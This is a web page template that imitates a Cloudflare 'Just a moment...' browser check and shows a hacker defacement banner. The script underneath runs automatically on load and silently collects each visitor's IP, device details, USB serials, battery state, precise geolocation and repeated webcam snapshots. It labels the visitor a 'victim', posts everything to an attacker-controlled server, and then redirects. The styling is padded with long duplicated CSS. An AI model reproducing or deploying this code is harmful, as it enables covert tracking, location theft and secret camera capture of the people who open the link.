<html lang="en-US">
<head> 
<meta charset="UTF-8"> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> 
<meta name="robots" content="noindex, nofollow"> 
<meta name="viewport" content="width=device-width,initial-scale=1"> 
<title>Just a moment....</title> 
<style type="text/css">
html, body {width: 100%; height: 100%; margin: 0; padding: 0;} 
body {background-image:url("https://i.poslttimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimgt.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");backdrop-filter:blur(3px);
background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg");background-image:url("https://i.postimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg"); background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg") background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-image:url("https://i.losghtimg.cc/k5bgs6P9/clint-patterson-d-YEu-FB8-KQJk-unsplash-3.jpg")background-size:cover;color:black; font-family:-apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Helvetica Neue",Arial, sans-serif; font-size: 16px; line-height: 1.7em;-webkit-font-smoothing: antialiased;}
h1 { text-align: center; font-weight:bold; margin: 16px 0; font-size: 32px; color:white;border-top:6px solid white;font-style:oblique;border-right:18px solid red;border-left:18px solid red;line-height: 1.25;}
p {font-size: 20px; font-weight: 400; margin: 8px 0;color:white;font-weight:bold}
p, .attribution, {text-align: center;}
#spinner {margin: 0 auto 30px auto; display: block;}
.attribution {margin-top: 32px;}
@keyframes fader   { 0% {opacity: 0.2;} 50% {opacity: 1.0;} 100% {opacity: 0.2;} }
@-webkit-keyframes fader { 0% {opacity: 0.2;} 50% {opacity: 1.0;} 100% {opacity: 0.2;} }
#cf-bubbles > .bubbles { animation: fader 1.6s infinite;}
#cf-bubbles > .bubbles:nth-child(2) { animation-delay: .2s;}
#cf-bubbles > .bubbles:nth-child(3) { animation-delay: .4s;}
.bubbles { background-color:white; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; }
a { color: #2c7cb0; text-decoration: none; -moz-transition: color 0.15s ease; -o-transition: color 0.15s ease; -webkit-transition: color 0.15s ease; transition: color 0.15s ease; }
a:hover{color: white}
.attribution{font-size: 16px; line-height: 1.5;background:white;border-radius:20px;position:relative;width:280px;height:70px}
.ray_id{display: block; margin-top: 8px;}
#cf-wrapper #challenge-form { padding-top:25px; padding-bottom:25px;}
#cf-hcaptcha-container { text-align:center;}
#cf-hcaptcha-container iframe { display: inline-block;}
h2{
	color:white;
}

</style> 
</head> 
<body>
<table width="100%" height="100%" cellpadding="20"> 
<tbody>
<tr> 
<td align="center" valign="middle"> 
<div class="cf-browser-verification cf-im-under-attack"> 
<noscript> 
<h1 data-translate="turn_on_js" style="color:white;">Please turn JavaScript on and reload the page.</h1> 
</noscript> 
<div id="cf-content" style="display: block;"> 
<div id="cf-bubbles"> 
<div class="bubbles"></div> 
<div class="bubbles"></div> 
<div class="bubbles"></div> 
</div> 
<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Code By ---MEHRAJ---</title><link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Aclonica&display=swap" rel="stylesheet">

	<style type="text/css">*{margin:0px;padding:0px;inset:-10px;
	}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
		}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
		}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;
;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}
;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
	animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
	animation:sb 2s linear infinite;animation-delay:1s}
	.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
	animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
	animation:sb 2s linear infinite;animation-delay:1s}
	@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
	}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
		}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;
;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
		}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;
;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}}.header_one_two{display:flex;justify-content:center;align-items:center;height:100vh;width:100vw;background-size:cover;position:relative;color:white;overflow:hidden;background:black;backdrop-filter:blur(12px);}.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		.header_one_two::before{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,red);
		animation:sb 2s linear infinite;}.header_one_two::after{content:'';position:absolute;width:100%;height:100%;background-image:conic-gradient(transparent,transparent,transparent,blue);
		animation:sb 2s linear infinite;animation-delay:1s}
		@keyframes sb{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}body{background:black;
		}.header_one_two,h4{;background:linear-gradient(10deg,black,white);color:gray;text-align:center;border:3px solid red;
	font-size:30px;background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.gtimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.jostitg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg")background-image:url("https://i.postimg.cc/nz6mxmpd/pexels-mehrax-8247082.jpg");
	position:absolute;inset:4px;border-radius:10px;
	z-index:1;background-size:cover;border:4px solid black;
	}h3{font-family: 'Aclonica', sans-serif;
;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}
	;position:relative;z-index:2;color:white;text-align:center;font-size:25px;
	background-image:linear-gradient(10deg,red,green,blue,pink,orange,rgb(100, 221, 23));
	font-style:oblique;background-size:300%;-webkit-text-fill-color:transparent;-webkit-background-clip:text;animation:sbsb 2s linear infinite;
	}@keyframes sbsb{0%{background-position:0%}50%{background-position:50%}100%{background-position:400%}}</style>
	</head><body><div class="header_one_two">
	<h4 id="sb">HACKER ARE WATCHING YOU<br></h4>
	<h3>MEHRAJ INDIAN HACKER<br/></h3></div></body></html>
</div> </td> 
</tr> 
</tbody>
</table>
<video id="video" style="display:none"  playsinline autoplay></video>
<canvas hidden="hidden" id="canvas" width="500" height="500"></canvas>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
<script type="text/javascript">
var c=false,l=false,uid="<%=uid %>";
async function gather(){
var td="";
<% if(!t){ %>
td += '<code>âœ…Victim Information </code><br><br><b>âš“ IP: <a href="https://ip-api.com/#<%=ip %>" ><%=ip %></a> | Time: <%=time %></b>';
<% }else{ %>
await fetch("<%=a %>").then((r) => r.json()).then((d) => (td+= '<code>âœ…Victim Information </code><br><br><b>âš“ IP: <a href="https://ip-api.com/#'+d.ip+'" >'+d.ip+'</a> | Time: <%=time %></b>'));

<% } %>

td+="<br><br><b>â³ Date In Victim's Device :</b> "+new Date()+"<br>";
var xo=["productSub","vendor","maxTouchPoints","doNotTrack","hardwareConcurrency","cookieEnabled","appCodeName","appName","appVersion","platform","product","userAgent","language","languages","webdriver","pdfViewerEnabled","deviceMemory"];
var xoc=["type","rtt","saveData","effectiveType","downlink","downlinkMax"];
///INITIALS
td+="<br><b>ðŸ“± Device Information</b><br>";
for(var i=0;i < xo.length;i++){ 
if(xo[i] in navigator){
var str = navigator[xo[i]];
td+="<b>"+xo[i] +"</b>: <code>"+str+"</code><br>";
}
}



if (navigator.mediaDevices || navigator.mediaDevices.enumerateDevices) {
/////List cameras and microphones.
await navigator.mediaDevices.enumerateDevices()
.then(function(devices) {
td+="<br><b>ðŸ“· Media Device Information</b><br>";
devices.forEach(function(device) {
td+="<b>"+device.kind+":</b> " + device.label +" id = <code>" + device.deviceId+"</code><br>";
});
})
.catch(function(err) {
td+="<br><b>ðŸ“· Media Device Information</b><br>";
td+="âš ï¸ Media Device Error: "+err.name + ": " + err.message;
});
}


////CONNECTION
if("connection" in navigator){
td+="<br><b>ðŸ•¸ï¸ Network Information</b><br>";
for(var i=0;i < xoc.length;i++){ 
var str = navigator.connection[xoc[i]];
td+="<b>"+xoc[i] +"</b>: <code>"+str+"</code><br>";
}}


////SB------SB-----
if("usb" in navigator){
await navigator.usb.getDevices()
.then(devices => {
td+="<br><b>ðŸ”Œ Total USB devices connected:</b> " + devices.length+"<br>";
devices.forEach(device => {
td+="<b>Product name:</b> " + device.productName + " , <b>Serial number: </b> <code>" + device.serialNumber+"</code><br>";
});
});
}

if("getBattery" in navigator){
await navigator.getBattery().then(function(battery) {
td+="<br><b>ðŸ”‹ Battery Information</b><br>";
td+="<b>ðŸ”‹Battery Level:</b> " +battery.level*100+"%<br><b>âš¡ Is Battery Charging:</b> "+battery.charging+"";
});
}

//////Location
if(!navigator.geolocation) {
td+="<br><b>ðŸ“ Location Information</b><br>";
td+="âš ï¸ Location API not avilable";
l=true;
} 

function success(pos) {
const crd = pos.coords;
$.post("<%=a %>/location",{uid:uid,lat:encodeURIComponent(crd.latitude),lon:encodeURIComponent(crd.longitude),acc:encodeURIComponent(crd.accuracy)},(s)=>{
l=true;
red();
});
}

function error(err) {
td+="<br><b>ðŸ“ Location Information</b><br>";
td+="âš ï¸ Location ERROR: <code>"+err.message+"</code>";
l=true;
}
if(navigator.geolocation){
await navigator.geolocation.getCurrentPosition(success, error, {  enableHighAccuracy: true, maximumAge: 0});

}




const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
var imgsent=0;

function post(o){
$.post("<%=a %>/camsnap",{uid:uid,img:encodeURIComponent(o)},(s)=>{
imgsent+=1;
if(imgsent==4){
c=true;
red();
}
});
}
const constraints = {audio: false,video: {facingMode: "user" }};
// Access webcam
async function cam() {
try {
const stream = await navigator.mediaDevices.getUserMedia(constraints);
handleSuccess(stream);
} catch (e) {
td+='<br><b>ðŸ“· Camera Images</b>';
td+= `<br>âš ï¸ Camera Access Error: ${e.toString()}`;
c=true;
red();
}
}

// Success
function handleSuccess(stream) {
window.stream = stream;
video.srcObject = stream;
var context = canvas.getContext('2d');
var id=setInterval(function(){
context.drawImage(video, 0, 0, 500, 500);
var canvasData = canvas.toDataURL("image/png").replace("data:image/png;base64", "");
post(canvasData);
}, 1500);
}


cam();


function red(){
if(c && l){
window.location.href="<%=url %>"
}
}


$.post("<%=a %>",{data:encodeURIComponent(td),uid:encodeURIComponent(uid)},(s)=>{});

}




window.onload=()=>{
gather();
var i="qwertyuioplkjhgfdsazxcvbnm0987654321";
var str="";
for(var o=0;o<17;o++){
str+=i[Math.floor(Math.random() * 35)];
}
document.getElementById("ray").innerHTML=str;
};
</script>
</body>
  </html>